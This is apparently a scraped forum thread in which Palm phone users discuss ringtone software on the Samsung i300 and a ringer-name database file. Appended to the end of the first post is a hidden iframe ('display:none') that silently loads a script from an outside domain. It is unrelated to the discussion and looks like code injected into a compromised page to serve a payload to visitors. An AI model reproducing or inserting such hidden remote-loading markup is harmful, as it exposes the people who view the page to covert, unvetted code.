    RIngtones for the i300 - minor progress, no success

    It did install on the i300 and did not blow up.

    It did see the alarm tones I already had.

    However, when I tap on ACTIVE in Groups or Individuals to enable it, I get
    "A Handspring Treo is required to use this function"

    If TreoCentral ever gets back to me with a patch, I'll let folks know here.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    ringtones...

    I was looking throught my backup directory and noticed a file called Bell-TeTk.pdb, and a bit of viewing shows that it has the names of the ringers in plaintext with a few binary characters in between. Presumably this is a "ringer name" database, and the binary characters may be a clue as to where in memory the ringers actually exist. More importantly, with a bit of work, we may have a way to add ringers. Or, we might have a tempest in a teapot :/
